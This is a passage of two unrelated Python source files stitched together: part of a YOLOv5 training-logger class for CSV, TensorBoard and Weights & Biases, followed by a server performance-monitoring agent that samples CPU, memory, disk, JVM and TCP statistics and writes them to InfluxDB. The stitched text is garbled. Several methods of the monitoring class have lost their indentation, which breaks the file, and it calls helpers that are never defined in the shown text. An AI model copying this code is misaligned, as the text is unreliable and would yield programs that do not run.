    # Only attempt an interactive-capable login on the main process (rank 0/-1)
    # and on wandb versions that support the login timeout argument.
    if pkg.parse_version(wandb.__version__) >= pkg.parse_version("0.12.2") and RANK in [
        0,
        -1,
    ]:
        wandb_login_success = wandb.login(timeout=30)
        if not wandb_login_success:
            wandb = None  # login failed/timed out: disable the wandb backend
except (ImportError, AssertionError):
    wandb = None  # wandb unavailable: all wandb logging is skipped downstream
class Loggers:
    """Aggregate YOLOv5 training loggers: results.csv, TensorBoard and W&B.

    One instance is created per training run; the training loop invokes the
    ``on_*`` callback methods at the matching lifecycle points.  Each backend
    is active only when it was requested via ``include`` AND could be
    initialised (``self.tb`` / ``self.wandb`` stay ``None`` otherwise).
    """

    def __init__(
        self,
        save_dir=None,
        weights=None,
        opt=None,
        hyp=None,
        logger=None,
        include=LOGGERS,
    ):
        """Initialise the requested logging backends.

        :param save_dir: run directory (Path) for results.csv, plots and
            TensorBoard event files.
        :param weights: checkpoint path; read to recover a W&B run id on resume.
        :param opt: training options namespace (uses .evolve, .resume,
            .save_period, .hyp).
        :param hyp: hyperparameter dict, forwarded to W&B.
        :param logger: logging.Logger for console messages.
        :param include: subset of LOGGERS to activate.
        """
        self.save_dir = save_dir
        self.weights = weights
        self.opt = opt
        self.hyp = hyp
        self.logger = logger  # for printing results to console
        self.include = include
        # Column order shared by results.csv, TensorBoard scalars and W&B.
        self.keys = [
            "train/box_loss",
            "train/obj_loss",
            "train/cls_loss",  # train loss
            "metrics/precision",
            "metrics/recall",
            "metrics/mAP_0.5",
            "metrics/mAP_0.5:0.95",  # metrics
            "val/box_loss",
            "val/obj_loss",
            "val/cls_loss",  # val loss
            "x/lr0",
            "x/lr1",
            "x/lr2",
        ]  # params
        for k in LOGGERS:
            setattr(self, k, None)  # init each backend attribute to None
        self.csv = True  # always log to csv

        # Suggest installing wandb when the import probe above disabled it.
        if not wandb:
            prefix = colorstr("Weights & Biases: ")
            s = f"{prefix}run 'pip install wandb' to automatically track and visualize YOLOv5 🚀 runs (RECOMMENDED)"
            print(emojis(s))

        # TensorBoard (skipped during hyperparameter evolution runs).
        s = self.save_dir
        if "tb" in self.include and not self.opt.evolve:
            prefix = colorstr("TensorBoard: ")
            self.logger.info(
                f"{prefix}Start with 'tensorboard --logdir {s.parent}', view at http://localhost:6006/"
            )
            self.tb = SummaryWriter(str(s))

        # W&B: resume a previous run when a run id can be recovered from the
        # checkpoint, otherwise start a fresh run.
        if wandb and "wandb" in self.include:
            wandb_artifact_resume = isinstance(
                self.opt.resume, str
            ) and self.opt.resume.startswith("wandb-artifact://")
            run_id = (
                torch.load(self.weights).get("wandb_id")
                if self.opt.resume and not wandb_artifact_resume
                else None
            )
            self.opt.hyp = self.hyp  # add hyperparameters
            self.wandb = WandbLogger(self.opt, run_id)
        else:
            self.wandb = None

    def on_pretrain_routine_end(self):
        # Callback runs on pre-train routine end: upload label plots to W&B.
        paths = self.save_dir.glob("*labels*.jpg")  # training labels
        if self.wandb:
            self.wandb.log(
                {"Labels": [wandb.Image(str(x), caption=x.name) for x in paths]}
            )

    def on_train_batch_end(self, ni, model, imgs, targets, paths, plots, sync_bn):
        # Callback runs on train batch end; ni is the integrated batch counter.
        if plots:
            if ni == 0:
                # BUGFIX: also require self.tb — it is None when TensorBoard
                # is not in `include` or during --evolve, and calling
                # add_graph on None crashed the first plotted batch.
                if (
                    self.tb and not sync_bn
                ):  # tb.add_graph() --sync known issue https://github.com/ultralytics/yolov5/issues/3754
                    with warnings.catch_warnings():
                        warnings.simplefilter("ignore")  # suppress jit trace warning
                        self.tb.add_graph(
                            torch.jit.trace(
                                de_parallel(model), imgs[0:1], strict=False
                            ),
                            [],
                        )
            if ni < 3:
                # Render the first three training mosaics in a background thread.
                f = self.save_dir / f"train_batch{ni}.jpg"  # filename
                Thread(
                    target=plot_images, args=(imgs, targets, paths, f), daemon=True
                ).start()
            if self.wandb and ni == 10:
                files = sorted(self.save_dir.glob("train*.jpg"))
                self.wandb.log(
                    {
                        "Mosaics": [
                            wandb.Image(str(f), caption=f.name)
                            for f in files
                            if f.exists()
                        ]
                    }
                )

    def on_train_epoch_end(self, epoch):
        # Callback runs on train epoch end (W&B tracks the 1-based epoch).
        if self.wandb:
            self.wandb.current_epoch = epoch + 1

    def on_val_image_end(self, pred, predn, path, names, im):
        # Callback runs on val image end: forward one image's predictions to W&B.
        if self.wandb:
            self.wandb.val_one_image(pred, predn, path, names, im)

    def on_val_end(self):
        # Callback runs on val end: upload validation plots to W&B.
        if self.wandb:
            files = sorted(self.save_dir.glob("val*.jpg"))
            self.wandb.log(
                {"Validation": [wandb.Image(str(f), caption=f.name) for f in files]}
            )

    def on_fit_epoch_end(self, vals, epoch, best_fitness, fi):
        # Callback runs at the end of each fit (train+val) epoch.
        # vals must align 1:1 with self.keys.
        x = {k: v for k, v in zip(self.keys, vals)}  # dict
        if self.csv:
            file = self.save_dir / "results.csv"
            n = len(x) + 1  # number of cols (+1 for the epoch column)
            s = (
                ""
                if file.exists()
                else (("%20s," * n % tuple(["epoch"] + self.keys)).rstrip(",") + "\n")
            )  # add header only on first write
            with open(file, "a") as f:
                f.write(s + ("%20.5g," * n % tuple([epoch] + vals)).rstrip(",") + "\n")
        if self.tb:
            for k, v in x.items():
                self.tb.add_scalar(k, v, epoch)
        if self.wandb:
            self.wandb.log(x)
            self.wandb.end_epoch(best_result=best_fitness == fi)

    def on_model_save(self, last, epoch, final_epoch, best_fitness, fi):
        # Callback runs on model save event: upload checkpoints on the
        # configured save_period cadence (never for the final epoch).
        if self.wandb:
            if (
                (epoch + 1) % self.opt.save_period == 0 and not final_epoch
            ) and self.opt.save_period != -1:
                self.wandb.log_model(
                    last.parent, self.opt, epoch, fi, best_model=best_fitness == fi
                )

    def on_train_end(self, last, best, plots, epoch):
        # Callback runs on training end: render result plots, push final images
        # to TensorBoard/W&B and upload the best checkpoint as a W&B artifact.
        if plots:
            plot_results(file=self.save_dir / "results.csv")  # save results.png
        files = [
            "results.png",
            "confusion_matrix.png",
            *[f"{x}_curve.png" for x in ("F1", "PR", "P", "R")],
        ]
        files = [
            (self.save_dir / f) for f in files if (self.save_dir / f).exists()
        ]  # filter to existing files only
        if self.tb:
            import cv2

            for f in files:
                # cv2 reads BGR; reverse the channel axis to get RGB for TB.
                self.tb.add_image(
                    f.stem, cv2.imread(str(f))[..., ::-1], epoch, dataformats="HWC"
                )
        if self.wandb:
            self.wandb.log(
                {"Results": [wandb.Image(str(f), caption=f.name) for f in files]}
            )
            # Calling wandb.log. TODO: Refactor this into WandbLogger.log_model
            if not self.opt.evolve:
                wandb.log_artifact(
                    str(best if best.exists() else last),
                    type="model",
                    name="run_" + self.wandb.wandb_run.id + "_model",
                    aliases=["latest", "best", "stripped"],
                )
                self.wandb.finish_run()
            else:
                # Evolution: close this run and open a fresh one for the next
                # generation of hyperparameters.
                self.wandb.finish_run()
                self.wandb = WandbLogger(self.opt)
|
performance_monitor.py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author: leeyoshinari
import os
import re
import time
import json
import copy
import queue
import traceback
import threading
from concurrent.futures import ThreadPoolExecutor
import requests
import influxdb
from common import handle_exception, get_ip
from logger import logger, cfg
class PerMon(object):
    def __init__(self):
        """Load agent/monitor configuration, probe static host facts (CPU model,
        cores, memory, NIC, disks, bandwidth), open the InfluxDB connection and
        start the worker thread pool.

        Side effects: raises via check_sysstat_version() when sysstat < 12 is
        installed, and ends by calling self.monitor(), which submits the
        long-running worker threads.
        """
        self.check_sysstat_version()
        self.IP = get_ip()
        # Number of ports that can be monitored concurrently; negative -> 0.
        self.thread_pool = cfg.getAgent('threadPool') if cfg.getAgent('threadPool') >= 0 else 0
        self._msg = {'port': [], 'pid': [], 'isRun': [], 'startTime': []}  # port, pid, status, startTime
        self.is_system = cfg.getMonitor('isMonSystem')  # Whether to monitor the server system
        self.error_times = cfg.getMonitor('errorTimes')
        self.sleepTime = cfg.getMonitor('sleepTime')
        self.maxCPU = cfg.getMonitor('maxCPU')
        self.CPUDuration = cfg.getMonitor('CPUDuration')
        self.isCPUAlert = cfg.getMonitor('isCPUAlert')
        self.minMem = cfg.getMonitor('minMem')
        self.isMemAlert = cfg.getMonitor('isMemAlert')
        self.isPidAlert = cfg.getMonitor('isPidAlert')
        self.errorTimesOfPid = cfg.getMonitor('errorTimesOfPid')
        self.frequencyFGC = cfg.getMonitor('frequencyFGC')
        self.isJvmAlert = cfg.getMonitor('isJvmAlert')
        self.echo = cfg.getMonitor('echo')
        self.isDiskAlert = cfg.getMonitor('isDiskAlert')
        self.maxDiskUsage = cfg.getMonitor('maxDiskUsage') / 100  # configured as %, stored as ratio
        self.isTCP = cfg.getMonitor('isTCP')
        self.timeSetting = cfg.getMonitor('timeSetting')
        system_interval = cfg.getMonitor('systemInterval')
        port_interval = cfg.getMonitor('portInterval')
        self.system_interval = max(system_interval, 1)  # If the set value is less than 1, the default is 1
        self.port_interval = max(port_interval, 1)  # If the set value is less than 1, the default is 1
        # Subtract the approximate cost of one sampling pass so the effective
        # period roughly matches the configured interval.
        self.system_interval = self.system_interval - 1.1  # Program running time
        self.system_interval = max(self.system_interval, 0)
        self.port_interval = self.port_interval - 1.03  # Program running time
        self.port_interval = max(self.port_interval, 0)
        self.system_version = ''  # system version
        self.cpu_info = ''
        self.cpu_usage = 0.0  # CPU usage
        self.cpu_cores = 0  # number of CPU core
        self.mem_usage = 0.0  # memory usage
        self.total_mem = 0  # total memory, unit: G
        self.total_mem_100 = 0  # total memory / 100, pre-scaled for %MEM -> GB conversion
        self.nic = ''  # network card
        self.all_disk = []  # disk number
        self.total_disk = 1  # total disk size, unit: M (starts at 1 to avoid division by zero)
        self.total_disk_h = 0  # total disk size, unit: T or G
        self.network_speed = cfg.getAgent('nicSpeed')  # bandwidth
        self.Retrans_num = self.get_RetransSegs()  # TCP retrans baseline counter
        self.get_system_version()
        self.get_cpu_cores()
        self.get_total_mem()
        self.get_system_nic()
        self.get_disks()
        self.get_system_net_speed()
        self.get_total_disk_size()
        self.monitor_task = queue.Queue()  # FIFO queue of (callable, arg) tasks
        # thread pool, +2 is the need for monitoring system and registration service
        self.executor = ThreadPoolExecutor(self.thread_pool + 2)
        self.client = influxdb.InfluxDBClient(cfg.getInflux('host'), cfg.getInflux('port'), cfg.getInflux('username'),
                                              cfg.getInflux('password'), cfg.getInflux('database'))  # influxdb connection
        self.FGC = {}  # full gc times, keyed by str(port)
        self.FGC_time = {}  # full gc timestamps, keyed by str(port)
        self.last_cpu_io = []  # sliding window of recent system CPU usage samples
        self.is_java = {}  # whether port is a java service, 0 or 1
        self.monitor()
    @property
    def start(self):
        """Current monitoring registry (ports, pids, run flags, start times)."""
        return self._msg
    @start.setter
    def start(self, value):
        """Register a port for monitoring, or resume a previously-stopped port.

        ``value`` is a dict with keys 'port', 'pid' and 'is_run'.  New or
        resumed ports get a write_cpu_mem task enqueued; while that task waits
        for a free worker the status is set to 2 (queueing).  Raises Exception
        when 'port' is falsy.
        """
        if value['port']:
            self.is_java_server(value['port'])  # Determine whether the port is java service
            if value['port'] in self._msg['port']:  # If the port has been monitored, update it
                index = self._msg['port'].index(value['port'])
                self._msg['pid'][index] = value['pid']
                # If the monitoring has been stopped, update the monitoring status and start monitoring time
                if self._msg['isRun'][index] == 0:
                    self._msg['isRun'][index] = value['is_run']
                    self._msg['startTime'][index] = time.strftime('%Y-%m-%d %H:%M:%S')
                    self.monitor_task.put((self.write_cpu_mem, index))  # Put the monitoring task into the queue
                    self.FGC[str(value['port'])] = 0  # reset FGC times
                    self.FGC_time[str(value['port'])] = []  # reset FGC time
                    if self.monitor_task.qsize() > 0:  # If the queue is not empty, the monitoring status is set to 2
                        self._msg['isRun'][index] = 2  # queueing
                else:
                    self._msg['isRun'][index] = value['is_run']
                    self._msg['startTime'][index] = time.strftime('%Y-%m-%d %H:%M:%S')
            else:
                self._msg['pid'].append(value['pid'])  # If the port has not been monitored, add it
                self._msg['port'].append(value['port'])
                self._msg['isRun'].append(value['is_run'])
                self._msg['startTime'].append(time.strftime('%Y-%m-%d %H:%M:%S'))
                self.monitor_task.put((self.write_cpu_mem, len(self._msg['port'])-1))  # Put the monitoring task into the queue
                self.FGC.update({str(value['port']): 0})  # initialize FGC times
                self.FGC_time.update({str(value['port']): []})  # initialize FGC time
                if self.monitor_task.qsize() > 0:  # If the queue is not empty, the monitoring status is set to 2
                    self._msg['isRun'][-1] = 2  # queueing
        else:
            raise Exception('Parameter Exception')
    @property
    def stop(self):
        """Monitoring registry; the setter flips a registered port's run flag."""
        return self._msg
@stop.setter
def stop(self, value):
index = self._msg['port'].index(value['port'])
self._msg['isRun'][index] = value['is_run']
def worker(self):
"""
Get data from the queue and start monitoring
:return:
"""
while True:
func, param = self.monitor_task.get()
func(param)
self.monitor_task.task_done()
def monitor(self):
"""
start monitoring
:return:
"""
for i in range(self.thread_pool + 2):
self.executor.submit(self.worker)
# Put registration and cleanup tasks in the queue
self.monitor_task.put((self.register_agent, True))
# Put the tasks of the monitoring system into the queue
self.monitor_task.put((self.write_system_cpu_mem, 1))
    def write_cpu_mem(self, index):
        """
        Monitoring loop for one port: CPU, Memory, jvm(Java), disk read/write,
        TCP counts. Samples via pidstat/netstat, writes each sample to InfluxDB
        and loops until the port's run flag drops to 0 or the command fails too
        many consecutive times.
        :param index: Subscript index of the port in self._msg
        :return:
        """
        self._msg['startTime'][index] = time.strftime('%Y-%m-%d %H:%M:%S')  # Update start monitoring time
        jvm = 0.0  # Initialize jvm, used for non-java services
        run_error_times = 0  # consecutive monitoring-command failures so far
        port = self._msg['port'][index]
        pid = self._msg['pid'][index]
        is_run_jvm = self.is_java.get(str(port), 0)
        # InfluxDB point template; fields are overwritten on every sample.
        line = [{'measurement': self.IP,
                 'tags': {'type': str(port)},
                 'fields': {
                     'cpu': 0.0,
                     'wait_cpu': 0.0,
                     'mem': 0.0,
                     'jvm': 0.0,
                     'rKbs': 0.0,
                     'wKbs': 0.0,
                     'iodelay': 0.0,
                     'tcp': 0,
                     'close_wait': 0,
                     'time_wait': 0
                 }}]
        while True:
            if self._msg['isRun'][index] > 0:  # Start monitoring
                self._msg['isRun'][index] = 1  # Reset the status to monitoring
                try:
                    pid_info = self.get_pid_cpu_mem_io(pid)  # get CPU, disk read and write
                    if not pid_info:  # If the CPU usage rate is None, the monitoring command is executed wrong.
                        logger.warning(f'The CPU is NOne, the abnormal pid is {pid}')
                        # NOTE(review): port_to_pid is defined elsewhere in this module — not visible here.
                        pid = port_to_pid(port)  # Query pid based on port
                        if pid:  # If the pid exists, update it
                            self._msg['pid'][index] = pid
                            self._msg['startTime'][index] = time.strftime('%Y-%m-%d %H:%M:%S')
                        else:
                            run_error_times += 1
                            # If continuous execution commands fails, stop monitoring
                            if run_error_times > self.error_times:
                                self._msg['isRun'][index] = 0
                                logger.error(f'The port {port} fails to execute commands continuously within '
                                             f'{self.error_times * self.sleepTime}s, and the monitoring has stopped.')
                                time.sleep(1)
                                break
                        if self.isPidAlert:
                            if run_error_times > self.errorTimesOfPid:
                                msg = f'The port {port} of the {self.IP} failed to execute commands continuously within ' \
                                      f'{self.errorTimesOfPid * self.sleepTime}s, and the monitoring had been stopped.'
                                logger.warning(msg)
                                self._msg['isRun'][index] = 0
                                thread = threading.Thread(target=notification, args=(msg,))  # Start thread to send email
                                thread.start()
                                time.sleep(1)
                                break
                        time.sleep(self.sleepTime)
                        continue
                    line[0]['fields']['cpu'] = pid_info['cpu']
                    line[0]['fields']['wait_cpu'] = pid_info['wait_cpu']
                    line[0]['fields']['mem'] = pid_info['mem']
                    line[0]['fields']['rKbs'] = pid_info['kB_rd']
                    line[0]['fields']['wKbs'] = pid_info['kB_wr']
                    line[0]['fields']['iodelay'] = pid_info['iodelay']
                    tcp_num = self.get_port_tcp(port)
                    line[0]['fields']['tcp'] = tcp_num.get('tcp', 0)
                    line[0]['fields']['close_wait'] = tcp_num.get('close_wait', 0)
                    line[0]['fields']['time_wait'] = tcp_num.get('time_wait', 0)
                    if is_run_jvm:
                        jvm = self.get_jvm(port, pid)  # get JVM size
                        line[0]['fields']['jvm'] = jvm
                    self.client.write_points(line)  # write database
                    logger.info(f'cpu_and_mem: port_{port},pid_{pid},{pid_info},{jvm}')
                    run_error_times = 0  # If the monitoring command is executed successfully, reset it
                except(Exception):
                    logger.error(traceback.format_exc())
                    time.sleep(self.sleepTime)
                time.sleep(self.port_interval)
            if self._msg['isRun'][index] == 0:  # If status=0, stop monitoring
                logger.info(f'Port {port} has been stopped monitoring.')
                self.FGC[str(port)] = 0
                self._msg['isRun'][index] = 0
                break
    def write_system_cpu_mem(self, is_system):
        """
        System-wide monitoring loop: CPU, Memory, Disk IO, Network, TCP.
        Writes one InfluxDB point per sample, maintains the CPU sliding window
        used for average-usage alerting, and triggers email / cache-clean
        threads on threshold breaches.  Never returns.
        :param is_system: unused placeholder (the queue task protocol passes one arg)
        :return:
        """
        cpu_flag = True  # Flag of whether to send mail when the CPU usage is too high
        mem_flag = True  # Flag of whether to send mail when the free memory is too low
        echo = True  # Flag of whether to clean up cache
        line = [{'measurement': self.IP,
                 'tags': {'type': 'system'},
                 'fields': {
                     'cpu': 0.0,
                     'iowait': 0.0,
                     'usr_cpu': 0.0,
                     'mem': 0.0,
                     'mem_available': 0.0,
                     'rec': 0.0,
                     'trans': 0.0,
                     'net': 0.0,
                     'tcp': 0,
                     'retrans': 0
                 }}]
        for disk in self.all_disk:
            # The system disks exists in the format of 'sda-1'. Since influxdb cannot recognize the '-', need to replace it.
            # Other formats need to be verified
            disk_n = disk.replace('-', '')
            line[0]['fields'].update({disk_n: 0.0})
            line[0]['fields'].update({disk_n + '_r': 0.0})
            line[0]['fields'].update({disk_n + '_w': 0.0})
            line[0]['fields'].update({disk_n + '_d': 0.0})
        while True:
            if self.is_system:
                try:
                    res = self.get_system_cpu_io_speed()  # get CPU, memory, IO, network, TCP
                    if res['disk'] and res['cpu'] is not None and res['mem'] is not None:
                        for k, v in res['disk'].items():
                            line[0]['fields'][k] = min(v, 100.0)  # clamp IO% at 100
                        for k, v in res['disk_r'].items():
                            line[0]['fields'][k] = v
                        for k, v in res['disk_w'].items():
                            line[0]['fields'][k] = v
                        for k, v in res['disk_d'].items():
                            line[0]['fields'][k] = v
                        line[0]['fields']['cpu'] = res['cpu']
                        line[0]['fields']['iowait'] = res['iowait']
                        line[0]['fields']['usr_cpu'] = res['usr_cpu']
                        line[0]['fields']['mem'] = res['mem']
                        line[0]['fields']['mem_available'] = res['mem_available']
                        line[0]['fields']['rec'] = res['rece']
                        line[0]['fields']['trans'] = res['trans']
                        line[0]['fields']['net'] = res['network']
                        line[0]['fields']['tcp'] = res['tcp']
                        line[0]['fields']['retrans'] = res['retrans']
                        self.client.write_points(line)  # write to database
                        logger.info(f"system: CpuAndMem,{res['cpu']},{res['mem']},{res['disk']},{res['disk_r']},"
                                    f"{res['disk_w']},{res['rece']},{res['trans']},{res['network']}, "
                                    f"{res['tcp']}, {res['retrans']}")
                        # Sliding window of the last CPUDuration samples for the average.
                        if len(self.last_cpu_io) > self.CPUDuration:
                            self.last_cpu_io.pop(0)
                        self.last_cpu_io.append(res['cpu'])
                        self.cpu_usage = sum(self.last_cpu_io) / len(self.last_cpu_io)  # CPU usage, with %
                        self.mem_usage = 1 - res['mem'] / self.total_mem  # Memory usage, without %
                        if self.cpu_usage > self.maxCPU:
                            msg = f'{self.IP} server CPU average usage is {self.cpu_usage}%, it is too high.'
                            logger.warning(msg)
                            if self.isCPUAlert and cpu_flag:
                                cpu_flag = False  # Set to False to prevent sending email continuously
                                thread = threading.Thread(target=notification, args=(msg,))
                                thread.start()
                        else:
                            cpu_flag = True  # If CPU usage is normally, reset it to True
                        if res['mem'] <= self.minMem:
                            msg = f"{self.IP} system free memory is {res['mem']}G, it is too low."
                            logger.warning(msg)
                            if self.isMemAlert and mem_flag:
                                mem_flag = False  # Set to False to prevent sending email continuously
                                thread = threading.Thread(target=notification, args=(msg, ))
                                thread.start()
                            if self.echo and echo:
                                echo = False  # Set to False to prevent cleaning up cache continuously
                                thread = threading.Thread(target=self.clear_cache, args=())
                                thread.start()
                        else:
                            mem_flag = True  # If free memory is normally, reset it to True.
                            echo = True
                except(Exception):
                    logger.error(traceback.format_exc())
                time.sleep(self.system_interval)
            else:
                time.sleep(3)
    @handle_exception(is_return=True, default_value=(None, None))
    def get_cpu_mem(self, pid):
        """
        Get CPU usage and Memory of pid via `top`. Now it is not used.
        :param pid: pid
        :return: CPU usage(%), Memory(G); (None, None) when pid is not found
        """
        cpu = None
        mem = None
        # result = os.popen(f'top -n 1 -b -p {pid}').readlines()
        # NOTE(review): grep -P treats {pid} as a regex and matches it anywhere
        # in the line; the exact-match check against column 0 below filters that.
        result = os.popen(f'top -n 1 -b |grep -P {pid}').readlines()
        res = [ress.split() for ress in result]
        logger.debug(f'The CPU and Mem of pid {pid} is: {res}')
        for r in res:
            if str(pid) == r[0]:
                ind = r.index(str(pid))
                # top reports %CPU over all cores and %MEM of total memory.
                cpu = float(r[ind + 8]) / self.cpu_cores  # CPU usage
                mem = float(r[ind + 9]) * self.total_mem_100  # Memory
        return cpu, mem
    @handle_exception(is_return=True, default_value=[])
    def get_pid_cpu_mem_io(self, pid):
        """
        Get CPU usage, Memory, and disk IO of pid via a single `pidstat` run.
        :param pid: pid
        :return: dict with CPU usage(%), Memory(G), Disk Read/Write(kB/s);
                 an empty list when pidstat produced no output (callers only
                 check truthiness, so the list/dict mismatch is benign)
        """
        pid_info = {'kB_rd': 0.0, 'kB_wr': 0.0, 'iodelay': 0.0, 'VSZ': 0.0, 'RSS': 0.0, 'mem': 0.0, 'usr_cpu': 0.0,
                    'system_cpu': 0.0, 'guest_cpu': 0.0, 'wait_cpu': 0.0, 'cpu': 0.0}
        # Reverse the output and keep the last 9 lines: pidstat prints the CPU,
        # MEM and IO sections last, each as a header line followed by a data line.
        res = os.popen(f'pidstat -u -r -d -p {pid} 1 1').readlines()[::-1][:9]
        if res:
            for i in range(len(res)):
                # Because the list is reversed, the data row precedes its header (i - 1).
                if 'iodelay' in res[i]:
                    io = res[i - 1].split()
                    pid_info['kB_rd'] = float(io[3]) / 1024  # Read from disk per second (kB)
                    pid_info['kB_wr'] = float(io[4]) / 1024  # Write to disk per second (kB)
                    # pid_info['iodelay'] = float(io[6])    # I/O delay(unit: clock cycle)
                if 'MEM' in res[i]:
                    memory = res[i - 1].split()
                    # pid_info['VSZ'] = float(memory[5]) / 1024   # Virtual memory
                    # pid_info['RSS'] = float(memory[6]) / 1024   # Physical memory
                    pid_info['mem'] = float(memory[7]) * self.total_mem_100  # Memory size
                if 'CPU' in res[i]:
                    cpu_res = res[i - 1].split()
                    # pid_info['usr_cpu'] = float(cpu_res[3]) / self.cpu_cores
                    # pid_info['system_cpu'] = float(cpu_res[4]) / self.cpu_cores
                    # pid_info['guest_cpu'] = float(cpu_res[5]) / self.cpu_cores
                    # pid_info['wait_cpu'] = float(cpu_res[6]) / self.cpu_cores     # CPU usage waiting for context switch
                    pid_info['cpu'] = float(cpu_res[7]) / self.cpu_cores  # CPU usage
            return pid_info
        else:
            return res
    @handle_exception(is_return=True, default_value=0)
    def get_jvm(self, port, pid):
        """
        Get JVM heap usage via `jstat -gc`, and track Full GC counts/timestamps
        to warn (optionally email) when FGC happens too frequently.
        :param port: port
        :param pid: pid
        :return: jvm(G)
        """
        result = os.popen(f'jstat -gc {pid}').readlines()[1]
        res = result.strip().split()
        logger.debug(f'The JVM of pid {pid} is: {res}')
        # Sum the used sizes of S0U, S1U, EU and OU columns (kB).
        mem = float(res[2]) + float(res[3]) + float(res[5]) + float(res[7])  # calculate JVM
        fgc = int(res[14])
        if self.FGC[str(port)] < fgc:  # If the times of FGC increases
            self.FGC[str(port)] = fgc
            self.FGC_time[str(port)].append(time.time())
            if len(self.FGC_time[str(port)]) > 2:  # Calculate FGC frequency
                # Interval (seconds) between the two most recent Full GCs.
                frequency = self.FGC_time[str(port)][-1] - self.FGC_time[str(port)][-2]
                if frequency < self.frequencyFGC:  # If FGC frequency is too high, send email.
                    msg = f'The Full GC frequency of port {port} is {frequency}, it is too high. Server IP: {self.IP}'
                    logger.warning(msg)
                    if self.isJvmAlert:
                        thread = threading.Thread(target=notification, args=(msg, ))
                        thread.start()
            # Write FGC times and time to log
            logger.warning(f"The port {port} has Full GC {self.FGC[str(port)]} times.")
        elif self.FGC[str(port)] > fgc:  # If the times of FGC is reduced, the port may be restarted, then reset it
            self.FGC[str(port)] = 0
        if self.FGC[str(port)] == 0:  # If the times of FGC is 0, reset FGC time.
            self.FGC_time[str(port)] = []
        return mem / 1048576  # 1048576 = 1024 * 1024, kB -> GB
    @handle_exception(is_return=True, default_value={})
    def get_system_cpu_io_speed(self):
        """
        Get system CPU usage, memory, disk IO, network speed, etc.

        Network throughput is derived from two /proc/net/dev snapshots taken
        around the ~1s `iostat -x -m 1 2` run, so both use the same interval.
        :return: dict of all sampled metrics (unsampled values stay None/{})
        """
        disk = {}
        disk_r = {}
        disk_w = {}
        disk_d = {}
        cpu = None
        iowait = None
        usr_cpu = None
        bps1 = None
        bps2 = None
        rece = None
        trans = None
        network = None
        if self.nic:
            bps1 = os.popen(f'cat /proc/net/dev |grep {self.nic}').readlines()
            logger.debug(f'The result of speed for the first time is: {bps1}')
        result = os.popen('iostat -x -m 1 2').readlines()
        logger.debug(f'The result of Disks are: {result}')
        if self.nic:
            bps2 = os.popen(f'cat /proc/net/dev |grep {self.nic}').readlines()
            logger.debug(f'The result of speed for the second time is: {bps2}')
        # iostat printed two reports; keep only the second (interval) report.
        result = result[len(result) // 2 - 1:]
        disk_res = [line.strip() for line in result if len(line) > 5]
        for i in range(len(disk_res)):
            if 'avg-cpu' in disk_res[i]:
                cpu_res = disk_res[i+1].strip().split()  # Free CPU
                cpu = 100 - float(cpu_res[-1])  # CPU usage = 100 - %idle
                iowait = float(cpu_res[-3])
                usr_cpu = float(cpu_res[0])
                logger.debug(f'System CPU usage rate is: {cpu}%')
                continue
            if 'Device' in disk_res[i]:
                for j in range(i+1, len(disk_res)):
                    disk_line = disk_res[j].split()
                    disk_num = disk_line[0].replace('-', '')  # influxdb cannot handle '-' in field names
                    disk.update({disk_num: float(disk_line[-1])})  # IO(%util)
                    disk_r.update({disk_num + '_r': float(disk_line[2])})  # Read MB/s
                    disk_w.update({disk_num + '_w': float(disk_line[8])})  # Write MB/s
                    disk_d.update({disk_num + '_d': float(disk_line[14])})  # MB/s
                logger.debug(f'The result of disks are: IO: {disk}, Read: {disk_r}, Write: {disk_w}')
                break
        mem, mem_available = self.get_free_memory()
        if bps1 and bps2:
            data1 = bps1[0].split()
            data2 = bps2[0].split()
            rece = (int(data2[1]) - int(data1[1])) / 1048576  # received bytes delta -> MB
            trans = (int(data2[9]) - int(data1[9])) / 1048576  # transmitted bytes delta -> MB
            # 400 = 8 * 100 / 2
            # Why multiply by 8, because 1MB/s = 8Mb/s.
            # Why divided by 2, because the network card is in full duplex mode.
            network = 400 * (rece + trans) / self.network_speed
            logger.debug(f'The bandwidth of ethernet is: Receive {rece}MB/s, Transmit {trans}MB/s, Ratio {network}%')
        tcp, Retrans = self.get_tcp()
        return {'disk': disk, 'disk_r': disk_r, 'disk_w': disk_w, 'disk_d': disk_d, 'cpu': cpu, 'iowait': iowait,
                'usr_cpu': usr_cpu, 'mem': mem, 'mem_available': mem_available, 'rece': rece, 'trans': trans,
                'network': network, 'tcp': tcp, 'retrans': Retrans}
@staticmethod
def get_free_memory():
"""
Get system memory
:return: free Memory, available Memory
"""
mem, mem_available = 0, 0
result = os.popen('cat /proc/meminfo').readlines()
logger.debug(f'The free memory is: {result}')
for res in result:
if 'MemFree' in res:
mem = int(res.split(':')[-1].split('k')[0].strip()) / 1048576 # 1048576 = 1024 * 1024
continue
if 'MemAvailable' in res:
mem_available = int(res.split(':')[-1].split('k')[0].strip()) / 1048576 # 1048576 = 1024 * 1024
continue
if mem and mem_available:
break
return mem, mem_available
'''def get_handle(pid):
"""
Get the number of handles occupied by the process
:param pid: pid
:return: the number of handles
"""
result = os.popen("lsof -n | awk '{print $2}'| sort | uniq -c | sort -nr | " + "grep {}".format(pid)).readlines()
res = result[0].strip().split(' ')
logger.debug(res)
handles = None
if str(pid) in res:
handles = int(res[0])
return handles'''
@handle_exception(is_return=True, default_value=(0, 0))
def get_tcp(self):
"""
Get the number of TCP and calculate the retransmission rate
:return:
"""
tcp = 0
Retrans = 0
if self.isTCP:
result = os.popen('cat /proc/net/snmp |grep Tcp').readlines()
tcps = result[-1].split()
logger.debug(f'The TCP is: {tcps}')
tcp = int(tcps[9]) # TCP connections
Retrans = int(tcps[-4]) - self.Retrans_num
self.Retrans_num = int(tcps[-4])
return tcp, Retrans
@handle_exception(is_return=True, default_value={})
def get_port_tcp(self, port):
"""
Get the number of TCP connections for the port
:param port: port
:return:
"""
tcp_num = {}
res = os.popen(f'netstat -ant |grep {port}').read()
tcp_num.update({'tcp': res.count('tcp')})
tcp_num.update({'established': res.count('ESTABLISHED')})
tcp_num.update({'close_wait': res.count('CLOSE_WAIT')})
tcp_num.update({'time_wait': res.count('TIME_WAIT')})
return tcp_num
def get_cpu_cores(self):
"""
Get CPU information
:return:
"""
cpu_model = None
cpu_num = 0
cpu_core = 0
try:
result = os.popen('cat /proc/cpuinfo | grep "model name" |uniq').readlines()[0]
cpu_model = result.strip().split(':')[1].strip()
logger.info(f'The CPU model is {cpu_model}')
except Exception as err:
logger.error('The CPU model is not found.')
logger.error(err)
try:
result = os.popen('cat /proc/cpuinfo | grep "physical id" | uniq | wc -l').readlines()[0]
cpu_num = int(result)
logger.info(f'The number of CPU is {cpu_num}')
